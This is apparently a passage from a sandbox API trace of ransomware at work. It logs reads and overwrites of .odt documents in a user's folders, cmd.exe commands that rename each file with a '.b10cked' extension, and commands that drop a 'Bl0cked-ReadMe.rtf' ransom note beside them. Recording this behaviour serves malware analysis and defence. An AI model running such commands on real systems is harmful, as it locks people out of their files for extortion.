0x3f [0138.064] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0138.064] 
CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe54, dwThreadId=0xdf8)) returned 1 [0138.106] CloseHandle (hObject=0x110) returned 1 [0138.106] CloseHandle (hObject=0x114) returned 1 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.106] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 1 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0138.106] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.106] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.106] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.107] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.107] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.107] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0138.107] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.107] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.107] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, 
lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xec0, dwThreadId=0xf20)) returned 1 [0138.114] CloseHandle (hObject=0x110) returned 1 [0138.114] CloseHandle (hObject=0x114) returned 1 [0138.114] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\bl0cked-readme.rtf")) returned 0x20 [0138.114] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.114] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.115] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.115] ReleaseMutex (hMutex=0xf8) returned 1 [0138.115] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\0q56t.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.115] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.115] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19490470294) returned 1 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.116] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x7efc [0138.117] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.118] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x7a14 [0138.118] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.118] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x7efc [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x7efc [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.119] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3f7d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.119] WriteFile (in: hFile=0x114, lpBuffer=0x1277a98*, nNumberOfBytesToWrite=0x3f7d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: 
lpBuffer=0x1277a98*, lpNumberOfBytesWritten=0x12ec1c*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.119] SetFilePointer (in: hFile=0x114, lDistanceToMove=-16253, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3f7f [0138.119] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3f7d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.120] SetFilePointer (in: hFile=0x114, lDistanceToMove=-16253, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3f7f [0138.120] WriteFile (in: hFile=0x114, lpBuffer=0x1277a98*, nNumberOfBytesToWrite=0x3f7d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1277a98*, lpNumberOfBytesWritten=0x12ec1c*=0x3f7d, lpOverlapped=0x0) returned 1 [0138.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0Q56T.odt", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0138.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0Q56T.odt", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0Q56T.odt", lpUsedDefaultChar=0x0) returned 9 [0138.130] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x7efc [0138.130] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.130] CloseHandle (hObject=0x114) returned 1 [0138.131] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\0Q56T.odt", 
lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt") returned 0x2c [0138.132] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0138.132] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xf1c, dwThreadId=0xe64)) returned 1 [0138.210] CloseHandle (hObject=0x110) returned 1 [0138.210] CloseHandle (hObject=0x114) returned 1 [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0138.210] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", 
cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 3 [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0138.210] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.210] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.210] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.210] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.210] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.210] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0138.211] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.211] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.211] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, 
lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xe08, dwThreadId=0xf5c)) returned 1 [0138.304] CloseHandle (hObject=0x110) returned 1 [0138.304] CloseHandle (hObject=0x114) returned 1 [0138.304] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0138.304] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.304] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.304] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.305] ReleaseMutex (hMutex=0xf8) returned 1 [0138.305] CreateFileW 
